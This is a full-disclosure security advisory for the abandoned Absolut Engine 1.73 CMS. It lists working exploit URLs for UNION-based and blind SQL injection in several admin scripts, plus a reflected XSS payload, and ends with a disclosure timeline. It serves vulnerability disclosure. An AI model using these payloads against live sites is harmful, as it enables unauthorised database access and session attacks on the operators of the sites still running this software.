Absolut Engine 1.73 Cross Site Scripting / SQL Injection

`Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.  
1.73 CMS  
  
Advisory ID: SROEADV-2014-08  
  
Author: Steffen Rösemann  
  
Affected Software: CMS Absolut Engine v. 1.73  
  
Vendor URL: http://www.absolutengine.com/  
  
Vendor Status: solved  
  
CVE-ID: -  
  
  
==========================  
  
Vulnerability Description:  
  
==========================  
  
  
The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL  
injection vulnerabilities and a XSS vulnerability in its administrative  
backend.  
  
  
==================  
  
Technical Details:  
  
==================  
  
  
The following PHP-Scripts are prone to SQL injections:  
  
  
*managersection.php (via sectionID parameter):*  
  
  
  
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*  
  
  
*Exploit Example:*  
  
  
  
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*  
  
  
*edituser.php (via userID parameter):*  
  
  
  
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*  
  
  
*Exploit Example:*  
  
  
  
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*  
  
  
  
*admin.php (via username parameter, BlindSQLInjection):*  
  
  
  
*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*  
  
  
*Exploit Example:*  
  
  
  
*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*  
  
  
*managerrelated.php (via title parameter):*  
  
  
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title  
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*  
  
  
*Exploit Example:*  
  
  
  
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*  
  
  
The last PHP-Script is as well vulnerable to a Reflecting XSS  
vulnerability.  
  
  
*Exploit Example:*  
  
  
  
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*  
  
  
Although this is a product which is not actively developed anymore, I  
think it is worth mentioning as the idea (of the lists) are to keep  
tracking (unknown) vulnerabilities in software products (but that is a  
personally point of view).  
  
  
Moreover, this product is still in use by some sites (!) and it is offered  
without a hint of its status.  
  
  
=========  
  
Solution:  
  
=========  
  
  
As the CMS is not actively developed, it shouldn't be used anymore.  
  
  
====================  
  
Disclosure Timeline:  
  
====================  
  
29-Dec-2014 – found the vulnerability  
  
29-Dec-2014 - informed the developers  
  
29-Dec-2014 – release date of this security advisory [without technical  
details]  
  
30-Dec-2014 – Vendor responded, won't patch vulnerabilities  
  
30-Dec-2014 – release date of this security advisory  
  
30-Dec-2014 – post on FullDisclosure  
  
  
  
========  
  
Credits:  
  
========  
  
  
Vulnerability found and advisory written by Steffen Rösemann.  
  
  
===========  
  
References:  
  
===========  
  
  
http://www.absolutengine.com/  
  
http://sroesemann.blogspot.de  
  
  
`